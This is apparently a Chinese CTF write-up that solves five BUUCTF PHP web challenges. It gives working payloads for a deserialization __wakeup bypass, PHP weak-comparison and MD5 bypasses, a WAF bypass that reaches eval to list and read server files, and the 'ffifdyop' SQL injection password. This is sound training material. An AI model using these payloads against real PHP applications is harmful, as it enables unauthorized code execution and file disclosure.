[极客大挑战 2019]PHP

由内容提示应该存在源码备份,常见的如下,一个个尝试

后缀:tar tar.gz zip rar

名字:www web website backup back wwwroot temp

访问www.zip,下载下来

解压查看

index.php

flag.php

class.php

<?php

include 'flag.php';

error_reporting(0);

class Name{

    private $username = 'nonono';

    private $password = 'yesyes';

    public function __construct($username,$password){

        $this->username = $username;

        $this->password = $password;

    }

    function __wakeup(){

        $this->username = 'guest';

    }

    function __destruct(){

        if ($this->password != 100) {

            echo "</br>NO!!!hacker!!!</br>";

            echo "You name is: ";

            echo $this->username;echo "</br>";

            echo "You password is: ";

            echo $this->password;echo "</br>";

            die();

        }

        if ($this->username === 'admin') {

            global $flag;

            echo $flag;

        }else{

            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";

            die();

        }

    }

}

?>

写一个脚本构造

<?php

class Name{

    private $username = 'admin';

    private $password = 100;

}

$A=new Name();

echo serialize($A);

?>

结果如下

O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
  • 这里需要绕过__wakeup函数,而__wakeup函数存在一个特性,当成员属性数目大于实际数目时才可绕过wakeup
  • 由于序列化的存在空字符,故需要%00来代替,即空字符的url编码
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

拿到flag

[ACTF2020 新生赛]BackupFile

题目提示备份文件

后缀:tar tar.gz zip rar

名字:www web website backup back wwwroot temp

除了以上这些,还有.bak/.swp/.old,都可以试试

这里使用dirsearch扫出来index.php.bak文件,下载下来

使用记事本打开

<?php

include_once "flag.php";

if(isset($_GET['key'])) {

    $key = $_GET['key'];

    if(!is_numeric($key)) {           //检查是否为数字

        exit("Just num!");

    }

    $key = intval($key);             //将变量转换为整数,eg:intval("cat12")=0  intval("3.14")=3

    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";

    if($key == $str) {               //注意这里的==符号

        echo $flag;

    }

}

else {

    echo "Try to find out source file!";

}

由于==的特性,php是一种弱语言,所以在比较的时候,会自动将字符串转换为数字比较,即123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3=123,这里可以查看intval函数的转换机制

?key=123

?key=123e4     //123*e的4次方,但是经过转换是123

得到flag

[RoarCTF 2019]Easy Calc

打开环境,输入1+1试试

查看源码,发现calc.php,并且注释提示有waf

访问看看,代码如下

<?php

error_reporting(0);

if(!isset($_GET['num'])){                          //isset:检测变量是否存在

    show_source(__FILE__);

}else{

        $str = $_GET['num'];

        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];  //黑名单

        foreach ($blacklist as $blackitem) {             //blackitem在blacklist中遍历,每次调用的值进入if语句比对

                if (preg_match('/' . $blackitem . '/m', $str)) {       //检测$str是否包含黑名单里的字符串

                        die("what are you want to do?");

                }

        }

        eval('echo '.$str.';');

}

?>

当我们输入被过滤的字符时,返回结果不是"what are you want to do?",而是如下结果,应该被waf绕过

测试发现可以解析数字,如果带有字符则会被过滤,尝试绕过waf并查看根目录,在num参数前添加空格绕过是为了将? num解析成?num即正常,绕过字符串无法解析

  • var_dump():打印字符串
  • scandir():查看指定目录并返回该目录中的文件和子目录的名称
url? num=var_dump(scandir(chr(47)))     //chr(47)= /  是ascii码

url?+num=var_dump(scandir(chr(47)))

url?/**/num=var_dump(scandir(chr(47)))

查找到f1agg

此时我们需要构造 /f1agg

chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)

file_get_contents():读取文件的内容并将其作为字符串返回

得到flag

[极客大挑战 2019]BuyFlag

打开环境,查看源码

访问该链接

看看源码,得到下面这个信息

	~~~post money and password~~~               //利用post方式传入money和password

if (isset($_POST['password'])) {

	$password = $_POST['password'];

	if (is_numeric($password)) {               //password必须是纯数字

		echo "password can't be number</br>";

	}elseif ($password == 404) {             //password为404,因为是==号,所以可用404ad绕过,会解析为404

		echo "Password Right!</br>";

	}

}

抓包看看

注意cookie这个地方,查看gpt

结合回显,需要我们是学生身份,将user=0改为user=1

此时回显,数字太长了,用科学计数法表示,在php中,1e9实际等于1*10的9次方

[BJDCTF2020]Easy MD5

打开环境,一个输入框,看看源码和网络信息,有个提示:

select * from 'admin' where password=md5($pass,true)   //$pass经过md5加密后,如果可用转换回二进制则转换,否则转换回16进制

随意输入看看,有一个传参点password

这里介绍一个万能密码-ffifdyop,经过md5加密后的值再解密为16进制是'or'6É]™é!r,ùíb,可用进行sql注入

成功进入

$a = $GET['a'];

$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){      //因为是弱比较,故需要a!=b但是md5值相同的

    // wow, glzjin wants a girl friend.

}

利用a=240610708&b=QNKCDZO绕过

看看源码:

 <?php

error_reporting(0);

include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){   //强比较

    echo $flag;

}

利用数组绕过

BUUCTF-Web方向16-20wp的更多相关文章

  1. Python Web 方向(一)

    Python Web 方向(一) --------Django站点创建 文章地址:http://www.cnblogs.com/likeli/p/5821744.html Python版本:2.7 推 ...

  2. web方向编程语言最全对比

    web方向编程语言最全对比 目前一般公司的后台用的开发语言大概有以下几种:java,python,php,asp.net,c++,node.js,ruby on rails 等. java 优点:性能 ...

  3. BUUCTF WEB

    BUUCTF 几道WEB题WP 今天做了几道Web题,记录一下,Web萌新写的不好,望大佬们见谅○| ̄|_ [RoarCTF 2019]Easy Calc 知识点:PHP的字符串解析特性 参考了一下网 ...

  4. BuuCTF Web Writeup

    WarmUp index.php <html lang="en"> <head> <meta charset="UTF-8"> ...

  5. C# ASP .NET WEB方向和WPF方向,我该如何去选择

    一个2012年南航毕业学软件的学生,该如何去选择我的职业方向? 2011年11分月份,我被老师介绍在南京珠江路华丽国际大厦工作,开发一个大型国际物流平台,公司的开发人员比较少,设计网站的是高校的老师, ...

  6. Java开发工程师(Web方向) - 04.Spring框架 - 第2章.IoC容器

    第2章.IoC容器 IoC容器概述 abstract: 介绍IoC和bean的用处和使用 IoC容器处于整个Spring框架中比较核心的位置:Core Container: Beans, Core, ...

  7. Java开发工程师(Web方向) - 02.Servlet技术 - 第3章.Servlet应用

    第3章.Servlet应用 转发与重定向 转发:浏览器发送资源请求到ServletA后,ServletA传递请求给ServletB,ServletB生成响应后返回给浏览器. 请求转发:forward: ...

  8. Java开发工程师(Web方向) - 02.Servlet技术 - 第1章.Servlet

    第1章--Servlet Servlet简介 Servlet应用于? 浏览器发出HTTP请求,服务器接收请求后返回响应给浏览器. 接收请求后到返回响应之间: 服务器将请求对象转交给Servlet容器 ...

  9. 序-WEB方向指南

    WEB 这个方向其实是目前从业人员最多的方向,也是学习安全门槛最低的方向,当然也是最容易恰饭的方向. 我从入行到现在也依旧没有脱离它,毕竟在我这个小城市.小圈子里,不干这个好像就要没饭吃了,但是你说它 ...

  10. Windows Azure Web Site (16) Azure Web Site HTTPS

    <Windows Azure Platform 系列文章目录> 我们在使用微软云Azure Web App的时候,会使用微软的二级域名:http://xxx.chinacloudsites ...

随机推荐

  1. vtkDelaunay2D 错误 Edge not recovered, polygon fill suspect

    vtkDelaunay2D 在设定SetSourceData边界处理凹多边形时,不稳定,有概率会出现"Edge not recovered, polygon fill suspect&quo ...

  2. vue3 学习笔记(不断更新中...)(2024.11.13)

    组合式API setup() 11 响应式API ref ref 用于创建响应式数据(通常用来定义 基本类型数据) 在JavaScript代码中,需要使用 .value 来操作数据 let count ...

  3. 用触摸屏辅助3D建模

    现在在触摸屏上进行3D建模的软件很多,这里说的是另一个概念. 我的设想是将触摸屏当做一个带有 ViewPort 的输入设备. 比如 Blender 在建模时,我们可以通过一个外接的触摸屏从另一个角度观 ...

  4. WPS在ArchLinux常见问题

    问题简述wps在aur源上有包,直接下载安装即可,但是通过包管理器安装的wps会出现一些奇怪的问题,我遇到的有两个: wps在打开时提示缺少字体wps word不能导出pdf文档,同时wps pdf也 ...

  5. springboot连接mysql报错errorCode 0, state 08S01

    前言许久未维护的项目需要检查一些数据,重新运行项目发现有create connection SQLException ,具体报错信息是 errorCode 0, state 08S01 . Sprin ...

  6. Spring Validation 校验

    概述 在 Web 应用中,客户端提交数据之前都会进行数据的校验,比如用户注册时填写的邮箱地址是否符合规范.用户名长度的限制等等,不过这并不意味着服务端的代码可以免去数据验证的工作,用户也可能使用 HT ...

  7. vagrant 修改配置生效

    vagrant reload --provision 起因 看 log 的时候以为写入错误,排查了几次才发现是系统时间不对,这里记录一下解决过程 手动同步时间 yum install ntpdate ...

  8. 国产系统中标麒麟neokylin上的视频监控系统

    一.功能特点 (一)软件模块 视频监控模块,各种停靠小窗体子模块,包括设备列表.图文警情.窗口信息.云台控制.预置位.巡航设置.设备控制.悬浮地图.网页浏览等. 视频回放模块,包括本地回放.远程回放. ...

  9. C#+ WPF 实现蓝牙转WIFI计步上位机

    前言 一个WIFI上位机,接收底层MPU6050数据,途中转蓝牙从机透传,到蓝牙主机直连WIFI,PC端UDP通信,实现三轴加速度数据传送和计步功能. 项目介绍 本项目基于.NET平台,使用WPF开发 ...

  10. Logstash介绍

    Logstash是一个开源数据收集引擎,具有实时管道功能.Logstash可以动态地将来自不同数据源的数据统一起来,并将数据标准化到你所选择的目的地. 集中.转换和存储你的数据 Logstash是一个 ...